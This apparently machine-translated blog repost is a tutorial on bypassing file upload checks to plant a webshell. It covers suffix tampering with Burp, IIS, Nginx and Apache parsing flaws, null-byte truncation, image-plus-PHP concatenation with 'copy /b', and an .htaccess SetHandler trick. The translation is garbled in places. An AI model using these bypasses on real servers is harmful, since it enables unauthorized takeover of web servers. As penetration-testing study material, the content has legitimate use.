Shulou(Shulou.com)06/01 Report--

File upload vulnerability is the most direct and effective way to obtain server permissions among all vulnerabilities. But it is not easy to make good use of him, because his upload posture is too gaudy. So here are some simple upload postures. Hope Daniel mistakenly sprayed

Shell upload conditions:

1. Upload point

2. Absolute path

3. You must have permission

File upload inspection posture

1. Client javascript check (usually only check the suffix)

2. Server verification

① header content-type Field check (image/gif)

② file content header check (GIF89a)

Blacklist check of ③ suffix name

Whitelist check of ④ suffix name

⑤ Custom regular check

3. WAF equipment verification (depending on different WAF products)

Start uploading (try uploading ponies first, then uploading ponies, because sometimes horses are more likely to be eaten)

1. Directly upload shell, that is, php files (no restrictions on file types)

2. Change the suffix

Upload other files in allowed upload formats such as png and jpg. Then grab the package through bp and change the suffix to php

Verify the blacklist and whitelist at the front end. How to judge: when browsing and loading files, but before clicking the upload button, the dialog box pops up. For example, only files with the suffixes of .jpg / .jpeg / .png are allowed to be uploaded, and no packets are sent at this time. Usually a javascript script)

3. Take advantage of the parsing vulnerability (that is, add / xx.php after the absolute path of the file)

Upload files such as png and take advantage of parsing vulnerabilities (web server with parsing vulnerabilities, lower version of iis6.0,iis7.0,iis7.5,Nginx)

4. Unrecognized suffix (blacklist verification on server)

To upload an shell.php.abc file, for example, the server looks forward for a resolvable suffix name because it does not recognize the abc suffix.

This item is only for the apache server apache to recognize the file suffix name from back to front, with a single. As a delimiter. When an unknown file suffix name is encountered, it continues to match forward until a recognizable suffix name is encountered. This feature of apache can be used to bypass the detection of some uploaded files. If a file upload page forbids uploading php files through the blacklist, then we can change the file name to test.php.abcd to upload)

5, 00 truncation

Upload a file similar to shell.php.jpg, use burpsuit to change the hexe value of the package, find shell.php.jpg under hex, change the value of the second point (2e, I remember) to 00, and then click forward (release the package)

6. Picture Horse

In the win system cmd, you can easily combine php files with jpg or png files, for example, copy / b 1.jpg+1.php shell.jpg can combine pictures with codes, because some servers will detect picture headers, if not picture headers are not allowed to upload. Combining the picture with the code can effectively hide *. Don't forget to upload the php file here. You can use the above methods.

(this is checked against the server content-type field)

7. Htaccess file * upload shell (blacklist verification on server)

The .htaccess file is a configuration file in the Apache server, which is responsible for the configuration of web pages in related directories. Through the htaccess file, you can achieve: Web page 301 redirect, customize 404 pages, change file extension, allow / block access to specific users or directories, prohibit directory list, configure default documents and other functions.

①, write .htaccess file

The code to be used is as follows:

SetHandler application/x-httpd-php

(through the. Htaccess file, the parser that calls php parses any file whose name contains the string "cimer". )

Then save the file (name and type are as follows)

②, upload .htaccess files

③, change the shell suffix to cimer

④, and then upload shell.cimer

⑤, and then you can connect

If you can't read it, please refer to http://www.sohu.com/a/125498727_609556.

There are many ways to upload, and there are all kinds of weird bypass methods. What I know is just a drop in the bucket. Here is a record of strange examples in order to avoid forgetting in the future.

Example: pirate cloud merchant members can getshell by adding file size under content-type after changing their avatar burpsuit to grab the package.

Or add * after uploading the image to getshell (there is a problem here, that is, there is no semicolon, but it is not successful if there is a semicolon)

Https://www.cnblogs.com/shellr00t/p/6426945.html is a good URL. You can take a look at it.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.